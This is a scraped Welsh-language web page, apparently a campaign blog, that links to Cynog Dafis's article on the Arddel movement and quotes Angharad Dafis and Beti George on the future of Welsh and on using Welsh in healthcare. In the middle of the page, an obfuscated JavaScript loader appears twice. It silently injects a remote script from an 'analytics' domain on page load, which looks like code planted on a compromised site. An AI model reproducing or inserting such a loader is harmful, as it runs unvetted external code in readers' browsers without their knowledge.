Erthygl Cynog Dafis am fudiad Arddel

Dyma ddolen i erthygl gan Cynog Dafis ar y mudiad iaith newydd Arddel, sy’n annog siaradwyr Cymraeg i ddefnyddio’r iaith drwy’r amser.

IWA – Click on Wales

 ;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

Beth mae Dyfodol i’r Iaith yn ei olygu i mi – Angharad Dafis

Mae sicrhau dyfodol i’r iaith Gymraeg yn bwysicach na llwyddiant unrhyw fudiad. Mae’n ymwneud â hunaniaeth y bobl hynny sy’n perthyn neu sy’n teimlo eu bod yn perthyn i’r cilcyn hwn o ddaear, a thrwy hynny yn rhan o gynhysgaeth y ddynoliaeth oll. Mae hi wrth reswm yn dreftadaeth i’r rheiny ohonom sy’n hanu o linach ddi-dor o siaradwyr Cymraeg. Mae hynny yn dipyn o ryfeddod. Mwy fyth o ryfeddod fodd bynnag yw’r ffaith fod cynifer wedi mynd ati i ddysgu ac i gofleidio’r Gymraeg, er na chawsant eu magu ynddi o’r crud.

Araith Beti George i gyfarfod lansio Dyfodol i’r Iaith, Eisteddfod Genedlaethol 2012

Dwy i ddim yn siwr  – a fydde  Saunders wedi mynnu siarad Cymraeg gyda’i feddyg neu nyrs hanner can mlynedd yn ol.

Fel roedd nyrs cymuned yn y gogledd yn dweud wrthyf yn  ddiweddar –  mae’r bobl hŷn yn credu mai Saesneg yw iaith doctor a nyrs ac ysbyty a fysen nhw byth yn breuddwydio gofyn am gael trafod eu probleme iechyd yn Gymraeg  –  er mai dyna’r iaith mae’n nhw’n fwya cyffyrddus ynddi.